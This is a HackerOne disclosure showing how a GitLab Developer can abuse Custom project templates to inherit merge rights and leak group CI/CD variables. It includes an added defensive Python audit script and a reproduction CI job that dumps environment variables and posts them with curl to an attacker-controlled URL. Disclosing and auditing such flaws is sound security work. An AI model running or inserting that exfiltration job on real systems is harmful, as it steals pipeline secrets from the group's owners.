Developer can leak group and any subgroup’s CI/CD variables using Custom project templates functionality
HackerOne report #2021616 by theluci
on 2023-06-12, assigned to @ottilia_westerlund:
Report
Hello,
GitLab recently fixed several bugs that allowed a developer to import a project and leak the group's CI/CD variables. To protect against these types of attacks, GitLab set the minimum role for importing projects to Maintainer.
GitLab also made the Custom project templates functionality usable by developers in the Enterprise Edition.
However, I found a bug through which a Developer can still leak the group's or any subgroup's CI/CD variables using the Custom project templates functionality.
Background
GitLab provides custom project templates as a Premium/Ultimate feature.
The owner of the top-level group can set a subgroup to be used as the source of custom templates for new projects in the group and in any of its subgroups.
Vulnerability
When issue #407374 (closed) was fixed, GitLab changed the import logic as follows:
When a member imports a project where specific members are Allowed to merge / Allowed to push and merge, GitLab replaces the user_id of the member allowed to merge with the user_id of the member importing the project.
That is, the member importing the project gets Allowed to merge / Allowed to push and merge access on the protected branch.
<------------------------------------------Important---------------------------------------------->
It was probably assumed that only maintainers/owners can import a project, so granting them Allowed to merge access would not be a bug.
However, the Custom project template functionality internally imports the template project.
Thus, if any maintainer, owner or other member has Allowed to merge permission on a protected branch of any of the templates, a developer can simply import the template (using the Custom project template functionality) and receive the Allowed to merge setting on the protected branch.
<------------------------------------------------------------------------------------------------------>
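The import behaviour above only becomes exploitable when a template project's protected branch carries a per-user grant (an entry with a concrete user_id) rather than a role-based one. As an added example (not part of this report or of GitLab's code), the following audit flags exactly those entries in the JSON returned by GitLab's `GET /projects/:id/protected_branches` endpoint, so an owner can review the template subgroup before (or after) enabling it as a template source. The sample response, the project id and the token name are constructed placeholders.

```python
import json
import urllib.request

# Constructed sample in the shape of GET /projects/:id/protected_branches,
# trimmed to the fields the check uses. user_id 7 stands for "victim".
SAMPLE_PROTECTED_BRANCHES = json.loads("""
[
  {"name": "main",
   "push_access_levels":  [{"access_level": 40, "access_level_description": "Maintainers", "user_id": null, "group_id": null}],
   "merge_access_levels": [{"access_level": 40, "access_level_description": "Maintainers", "user_id": null, "group_id": null},
                           {"access_level": 40, "access_level_description": "victim", "user_id": 7, "group_id": null}]},
  {"name": "release/*",
   "push_access_levels":  [{"access_level": 0,  "access_level_description": "No one", "user_id": null, "group_id": null}],
   "merge_access_levels": [{"access_level": 40, "access_level_description": "Maintainers", "user_id": null, "group_id": null}]}
]
""")


def user_specific_grants(protected_branches):
    """Return (branch, kind, user_id) for every per-user push or merge grant.

    Role-based entries (user_id is null) are copied unchanged on import; the
    entries this report abuses are the ones tied to a specific user_id, because
    the import rewrites that user_id to the importing member.
    """
    findings = []
    for branch in protected_branches:
        for kind in ("push_access_levels", "merge_access_levels"):
            for entry in branch.get(kind, []):
                if entry.get("user_id") is not None:
                    findings.append((branch["name"], kind, entry["user_id"]))
    return findings


def fetch_protected_branches(base_url, project_id, token):
    """Live variant against a real instance (assumed placeholders; not run offline)."""
    req = urllib.request.Request(
        f"{base_url}/api/v4/projects/{project_id}/protected_branches",
        headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Run over every project in the template subgroup; any finding is a
    # branch whose merge/push grant a Developer could inherit via "Create from template".
    for name, kind, uid in user_specific_grants(SAMPLE_PROTECTED_BRANCHES):
        print(f"{name}: {kind} granted to user_id={uid}")
```

Replacing a flagged per-user grant with a role-based one (or removing it) closes the path this report describes until the instance is patched.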
Steps to reproduce
(Your instance must have an ultimate trial)
1. victim creates a group `victim-group`.
2. victim creates a subgroup `subgroup-to-be-template` and template projects `template1`, `template2` inside it.
3. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/edit, expands Custom project templates and selects `subgroup-to-be-template`.
4. victim goes to the template1 repository settings at http://<Your_Instance_IP>/<victim-group>/<subgroup-to-be-template>/template1/-/settings/repository, expands Protected branches and gives himself Allowed to merge OR Allowed to push and merge access on the protected branch.

In a real-world scenario, it may not be the owner but any member (maybe a maintainer or some other member) that has Allowed to merge / Allowed to push and merge access on a protected branch of any of the templates.
It might also be that no role is Allowed to merge / Allowed to push and merge, but specific users (any user) are.

As victim,

5. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/settings/ci_cd, expands Variables and adds some CI/CD variables.
6. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/group_members and adds attacker as Developer.

As attacker,

7. attacker goes to `victim-group`, clicks on New project and chooses Create from template.
8. attacker uses `template1` and creates `attacker-project`. attacker now has Allowed to merge / Allowed to push and merge access on the protected branch of `attacker-project`.
9. attacker adds the following .gitlab-ci.yml file:

```yaml
job_name:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" attacker-controlled-url
```

The group's CI/CD variables are sent to attacker-controlled-url.
Output of checks
This bug happens on a self-hosted GitLab instance.
Results of GitLab environment info
```text
System information
System:         Ubuntu 20.04
Proxy:          no
Current User:   git
Using RVM:      no
Ruby Version:   3.0.6p216
Gem Version:    3.4.13
Bundler Version: 2.4.13
Rake Version:   13.0.6
Redis Version:  6.2.11
Sidekiq Version: 6.5.7
Go Version:     unknown

GitLab information
Version:        16.0.4-ee
Revision:       7d6834bd32e
Directory:      /opt/gitlab/embedded/service/gitlab-rails
DB Adapter:     PostgreSQL
DB Version:     13.11
URL:            http://x.x.x.x
HTTP Clone URL: http://x.x.x.x/some-group/some-project.git
SSH Clone URL:  git@x.x.x.x:some-group/some-project.git
Elasticsearch:  no
Geo:            no
Using LDAP:     no
Using Omniauth: yes
Omniauth Providers:

GitLab Shell
Version:        14.20.0
Repository storages:
- default:      unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
Impact
A Developer of a group can leak the group's or any subgroup's CI/CD variables.